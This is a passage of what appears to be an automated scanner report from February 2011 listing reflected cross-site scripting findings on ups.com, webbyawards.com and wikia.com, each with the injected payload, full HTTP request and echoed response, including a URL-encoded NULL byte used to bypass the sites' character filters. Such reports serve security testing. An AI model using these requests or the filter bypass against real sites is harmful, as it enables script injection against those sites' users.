The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6808'%3bdb8080cd607 was submitted in the REST URL parameter 2. This input was echoed as f6808';db8080cd607 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefappf6808'%3bdb8080cd607 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44368


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
8080cd607';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/sharp/prefappf6808';db8080cd607';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/sharp/prefappf6808';db8080cd607';
actionUrl = "/one-to-one/login?ID=100&loc=" + t
...[SNIP]...

1.466. https://www.ups.com/sharp/prefapp [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0066d80</script><script>alert(1)</script>b0ec02ae3bc was submitted in the loc parameter. This input was echoed as 66d80</script><script>alert(1)</script>b0ec02ae3bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%0066d80</script><script>alert(1)</script>b0ec02ae3bc&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_66d80</script><script>alert(1)</script>b0ec02ae3bc';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_66d80</script>
...[SNIP]...

1.467. https://www.ups.com/sharp/prefapp [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00719ef'-alert(1)-'2df5a1668f0 was submitted in the loc parameter. This input was echoed as 719ef'-alert(1)-'2df5a1668f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%00719ef'-alert(1)-'2df5a1668f0&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'2df5a1668f0';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_719ef'-alert(1)-'2df5a1668f0';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_719ef'-alert(1)-'2df5a1668f0';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.468. https://www.ups.com/sharp/prefapp [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0039e38"><script>alert(1)</script>3b2cdfd84b8 was submitted in the loc parameter. This input was echoed as 39e38"><script>alert(1)</script>3b2cdfd84b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%0039e38"><script>alert(1)</script>3b2cdfd84b8&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_39e38"><script>alert(1)</script>3b2cdfd84b8&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_39e38%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B3b2cdfd84b8%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.469. https://www.ups.com/uis/create [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4095b"%20a%3db%20b63a7a57432 was submitted in the REST URL parameter 1. This input was echoed as 4095b" a=b b63a7a57432 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis4095b"%20a%3db%20b63a7a57432/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42241


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/uis4095b" a=b b63a7a57432/create?appid=UIS">
...[SNIP]...

1.470. https://www.ups.com/uis/create [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b1bd'%3b588801ad5 was submitted in the REST URL parameter 1. This input was echoed as 3b1bd';588801ad5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis3b1bd'%3b588801ad5/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d5/create?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis3b1bd';588801ad5/create?appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/uis3b1bd';588801ad5/create?appid=UIS';
actionUrl = "/one-to-one/
...[SNIP]...

1.471. https://www.ups.com/uis/create [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload ad3bb%0a74617239e86 was submitted in the REST URL parameter 1. This input was echoed as ad3bb
74617239e86
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uisad3bb%0a74617239e86/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42143


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/uisad3bb
74617239e86
/create?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uisad
...[SNIP]...

1.472. https://www.ups.com/uis/create [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 6b8b2%0ae3b2b84beb9 was submitted in the REST URL parameter 2. This input was echoed as 6b8b2
e3b2b84beb9
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/create6b8b2%0ae3b2b84beb9 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42152


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/uis/create6b8b2
e3b2b84beb9
?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis/create6b
...[SNIP]...

1.473. https://www.ups.com/uis/create [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0e15"%20a%3db%2027a12099018 was submitted in the REST URL parameter 2. This input was echoed as b0e15" a=b 27a12099018 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/createb0e15"%20a%3db%2027a12099018 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:45 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42328


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/uis/createb0e15" a=b 27a12099018?appid=UIS">
...[SNIP]...

1.474. https://www.ups.com/uis/create [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1254a'%3bae2686a7b9a was submitted in the REST URL parameter 2. This input was echoed as 1254a';ae2686a7b9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/create1254a'%3bae2686a7b9a HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42244


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
9a?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis/create1254a';ae2686a7b9a?appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/uis/create1254a';ae2686a7b9a?appid=UIS';
actionUrl = "/one-to-one/login
...[SNIP]...

1.475. https://www.ups.com/uis/create [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %008760f</script><script>alert(1)</script>e6835d0adba was submitted in the loc parameter. This input was echoed as 8760f</script><script>alert(1)</script>e6835d0adba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/create?loc=en_US%008760f</script><script>alert(1)</script>e6835d0adba&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10986


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_8760f</script><script>alert(1)</script>e6835d0adba&appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_8760f
...[SNIP]...

1.476. https://www.ups.com/uis/create [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001b991'-alert(1)-'d321cced5f0 was submitted in the loc parameter. This input was echoed as 1b991'-alert(1)-'d321cced5f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/create?loc=en_US%001b991'-alert(1)-'d321cced5f0&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10310


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
ed5f0&appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1b991'-alert(1)-'d321cced5f0&appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_1b991'-alert(1)-'d321cced5f0&appid=UIS';
actionUrl = "/one-to-on
...[SNIP]...

1.477. https://www.ups.com/uis/create [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00796b6"><script>alert(1)</script>b4cf012dbf6 was submitted in the loc parameter. This input was echoed as 796b6"><script>alert(1)</script>b4cf012dbf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/create?loc=en_US%00796b6"><script>alert(1)</script>b4cf012dbf6&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10886


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_796b6"><script>alert(1)</script>b4cf012dbf6&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_796b6%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bb4cf012dbf6%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.478. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webbyawards.com
Path:   /webbys/current_honorees.php

Issue detail

The value of the media_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e24"><script>alert(1)</script>346d75171f8 was submitted in the media_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webbys/current_honorees.php?media_id=96f9e24"><script>alert(1)</script>346d75171f8&category_id=61&season=13 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:49 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=5fff8524ae22c0822fbc5b51180eb842; expires=Mon, 21-Feb-2011 01:24:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="media_id" value="96f9e24"><script>alert(1)</script>346d75171f8">
...[SNIP]...

1.479. http://www.webbyawards.com/webbys/current_honorees.php [season parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webbyawards.com
Path:   /webbys/current_honorees.php

Issue detail

The value of the season request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0049771"><script>alert(1)</script>65931fe07a7 was submitted in the season parameter. This input was echoed as 49771"><script>alert(1)</script>65931fe07a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /webbys/current_honorees.php?media_id=96&category_id=61&season=13%0049771"><script>alert(1)</script>65931fe07a7 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:53 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=4dcb5dc8d0991f164ae99145ff045147; expires=Mon, 21-Feb-2011 01:24:53 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21356


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<a href="current_honorees.php?media_id=96&season=13.49771"><script>alert(1)</script>65931fe07a7">
...[SNIP]...

1.480. http://www.wikia.com/index.php [actionName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wikia.com
Path:   /index.php

Issue detail

The value of the actionName request parameter is copied into the HTML document as text between TITLE tags. The payload b2c83</title><script>alert(1)</script>95be19a1de3 was submitted in the actionName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?action=ajax&rs=moduleProxy&moduleName=LatestActivity&actionName=Indexb2c83</title><script>alert(1)</script>95be19a1de3&outputType=html HTTP/1.1
